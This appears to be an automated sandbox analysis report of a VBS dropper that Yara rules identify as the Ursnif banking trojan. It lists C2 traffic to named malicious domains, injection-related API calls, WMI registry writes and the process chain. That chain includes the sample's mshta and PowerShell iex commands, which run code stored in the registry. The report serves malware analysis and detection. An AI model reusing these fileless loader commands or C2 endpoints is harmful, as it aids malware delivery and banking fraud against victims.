                    Source: global trafficHTTP traffic detected: GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                    Source: global trafficHTTP traffic detected: POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                    Source: global trafficHTTP traffic detected: POST /08OHsz1N1FvuG6kjmE/aTh0zMsnZ/SI0oUmCO_2BS5MoLEECj/uZ7K5bJdnYQx3WN05uH/v_2Fm83_2BmFHvZHPW65zA/GW0_2BJDiUD1w/ZK6b_2Bh/StY6HpePFkaOsmwn5z64jk4/hNqOPWlFAk/QdUHTQ0be2zDX_2Bp/gFERm0UEw08y/zSKvozh3BGq/IuojbbR5mE_2FM/dq0z5j8vfE1Mb6ztPRP2X/B41DadMfELfCe7ey/X881VUbPPRiD756/vcgjm_2B6diCc8QiJ8/zWiCv09og/LPjcs0IySRyGzo4FtAjY/MaQN7Yj0rwdcUGBU3Lw/cxZIrRpMI9kt/XnFePhCWR/v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=124046255642640572323054504739User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 675Host: art.microsoftsofymicrosoftsoft.at
                    Source: rundll32.exe, 00000012.00000002.870125823.0000000000B1A000.00000004.00000020.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/
                    Source: rundll32.exe, 00000012.00000003.809344105.0000000000B86000.00000004.00000001.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNW
                    Source: rundll32.exe, 00000012.00000003.797288272.0000000000B78000.00000004.00000001.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44eu
                    Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                    Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                    Source: powershell.exe, 00000016.00000003.845905572.00000200ADF45000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: rundll32.exe, 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                    Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000016.00000002.872464143.00000200AE0A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000016.00000002.872992531.00000200AE2AF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000016.00000002.890166095.00000200BE0FD000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownHTTP traffic detected: POST /W7oPFKe8v92MJK/3s9n12Zlxxip0RpYqadjX/SO7W1_2FF9Pkd4OV/Fr1cAJR5yzwxrV5/Jx7W_2FGpEVbkHb92i/nk7onhk3e/t3LARu0x8PsikCuNcG3A/xVZtlmy23EEwScpeJDo/wvuFYBZUTBSU84oV7Elz6G/vj_2F1HMVCKsF/ltj9usP8/bN_2Bx9_2BXwYInwNajYI72/h9Hrv5vhx_/2F82si9cIkqX7v6R4/9UOOaco5x39h/66X8TzwdR07/vkpw_2FwebnNKA/xttU1J1hU1aqHEwJ_2BPb/e_2FLASBRA3M51hv/aDQxYMFh2bS_2BM53oI/t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                    Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /M0s2qYX0svCgNwwi/PPI7Xc5SLSkLQIY/5lrOW2oNgPCEjObB3W/rK9MpeZNZ/UBjNTHqn019AlZCIEx5P/tkwag9cTBuiHiomNMOd/c4Fs5ApV0T_2BnjVwW3gyf/bJPiicUJ8f_2F/p_2BzDHN/AttyzxcYoU5_2FqrCObbGoi/jSm_2BVGxu/KGJY3tUfrdwytDYZ_/2BjCzYCnXysU/C2JbU3dlXVl/5uJ7MQlXxw8eLV/q0zaTcL3CTeSA980379DA/dHPHAS9NwOC9V6VK/lP_2FDVrlGe4ayd/LAmEzNRn3GukTSqHPk/HGsc32BVj/4Gvn4Q9G8MH6Q5yTHXJc/ulutZq7s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                    System Summary:

                    barindex
                    Writes registry values via WMIShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F2725F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F27E30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F21754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05753570
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057310E6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057390A1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05735C88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05747B5D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057443B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0573FBA9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0573423D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0574DAED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0573E6B4 CreateProcessAsUserA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F26EB3 GetProcAddress,NtCreateSection,memset,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F27666 NtMapViewOfSection,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F28055 NtQueryVirtualMemory,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057509D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0574B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0574F7F5 NtQueryInformationProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0575079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05746657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05740E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05735166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05739D36 NtGetContextThread,RtlNtStatusToDosError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057455D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05745878 memset,NtWow64QueryInformationProcess64,GetProcAddress,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05740CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05748890 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0574A71C NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05740FBD memset,NtQueryInformationProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0574FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05750BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0573579C NtQuerySystemInformation,RtlNtStatusToDosError,
                    Source: cshxvr3e.dll.26.drStatic PE information: No import functions for PE file found
                    Source: kuljoghz.dll.24.drStatic PE information: No import functions for PE file found
                    Source: sample.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210910Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winVBS@22/20@7/1
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
